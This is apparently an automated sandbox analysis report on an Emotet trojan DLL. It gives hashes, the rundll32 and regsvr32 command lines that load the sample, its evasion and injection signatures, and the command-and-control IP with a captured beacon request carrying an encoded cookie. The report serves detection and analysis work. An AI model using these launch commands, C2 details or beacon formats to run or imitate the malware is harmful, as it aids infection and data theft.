Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r0hiaXHscs.dll

Overview

General Information

Sample Name:r0hiaXHscs.dll
Analysis ID:626489
MD5:28fd92e0ce7538516dcea70e239fb177
SHA1:483d573cd7d464b01c880998e0321970a635e8d0
SHA256:198a1b06c69382d00cf775aa56d2172f6d0412f31753bda078620107ee998283
Tags:exetrojan
Infos:

Detection

Emotet
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7072 cmdline: loaddll64.exe "C:\Users\user\Desktop\r0hiaXHscs.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 7092 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 7136 cmdline: regsvr32.exe /s C:\Users\user\Desktop\r0hiaXHscs.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 6392 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FxQLsR\ONbDjBVKT.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 3504 cmdline: rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3980 cmdline: rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 3272 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2332 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.775504614.0000000002C40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000004.00000002.399182634.0000013444F90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.395798586.000002165C820000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.13444f90000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.2165c820000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.2.regsvr32.exe.5a0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  6.2.regsvr32.exe.2c40000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.13444f90000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: r0hiaXHscs.dllVirustotal: Detection: 35%Perma Link
                      Source: https://23.239.0.12/awAvira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.6:49772 version: TLS 1.2
                      Source: r0hiaXHscs.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.775197896.0000000000FB5000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.775197896.0000000000FB5000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Gg=8GHy3N4Xm4BasGI7yF4aqbYZ+UfwCGyAbOlBL+16WxGiVKGpNRlXTVpgGtiVDv4o6m2fAcCSHbC7mYMUPTjqe4US1mRyANHQJL7kUXdkMIV97NOv6NlFY6ItHTPKLQm3cab3RqaCCTHdeUJgOXpfGnYvQigwPZkv1S1NderwBdUbUrQpVsTBxEAdf7eBMQneqNUwyO1NGdrv9JdDXBeFHpBIJABa3NfDOXQ+k98+uc8fHA==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: regsvr32.exe, 00000006.00000003.467034320.0000000001439000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775460304.0000000001439000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.766280874.000001F25DB00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000017.00000002.766213350.000001F25D2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000E.00000002.548646295.000001A6FB27B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft
                      Source: regsvr32.exe, 00000006.00000003.467319252.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775356330.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.467211849.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000006.00000003.467319252.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775356330.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.467211849.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/aw
                      Source: svchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000017.00000003.729809833.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729965849.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729933938.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729828603.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729850048.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.730030081.000001F25E019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729874316.000001F25E003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000017.00000003.729809833.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729965849.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729933938.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729828603.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729850048.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.730030081.000001F25E019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729874316.000001F25E003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000017.00000003.729809833.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729965849.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729933938.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729828603.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729850048.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.730030081.000001F25E019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729874316.000001F25E003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000017.00000003.745516041.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                      Source: svchost.exe, 00000017.00000003.745558940.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745533948.000001F25DB9F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745516041.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745479650.000001F25DBB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745454811.000001F25DBB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,6_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Gg=8GHy3N4Xm4BasGI7yF4aqbYZ+UfwCGyAbOlBL+16WxGiVKGpNRlXTVpgGtiVDv4o6m2fAcCSHbC7mYMUPTjqe4US1mRyANHQJL7kUXdkMIV97NOv6NlFY6ItHTPKLQm3cab3RqaCCTHdeUJgOXpfGnYvQigwPZkv1S1NderwBdUbUrQpVsTBxEAdf7eBMQneqNUwyO1NGdrv9JdDXBeFHpBIJABa3NfDOXQ+k98+uc8fHA==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.6:49772 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.13444f90000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2165c820000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2c40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.13444f90000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2c40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2165c820000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.775504614.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.399182634.0000013444F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.395798586.000002165C820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.401159904.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\FxQLsR\ONbDjBVKT.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\FxQLsR\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBAA0C2_2_00007FFF21BBAA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBB5CC2_2_00007FFF21BBB5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB59442_2_00007FFF21BB5944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB895C2_2_00007FFF21BB895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBFCA02_2_00007FFF21BBFCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBFB6C2_2_00007FFF21BBFB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBEB602_2_00007FFF21BBEB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBA77C2_2_00007FFF21BBA77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBAF702_2_00007FFF21BBAF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB6F0C2_2_00007FFF21BB6F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBE6C02_2_00007FFF21BBE6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_005600002_2_00560000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C202_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C0582_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800091002_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800079582_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C6082_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800216182_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E282_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE82_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800118342_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800238312_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC482_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC482_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800064582_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4602_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800298882_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA02_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A82_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB02_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B42_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B42_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B82_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B82_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C42_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D42_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE42_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F02_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F82_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9042_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800215102_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9172_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C9642_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D82_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E02_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE02_2_0000000180001FE0
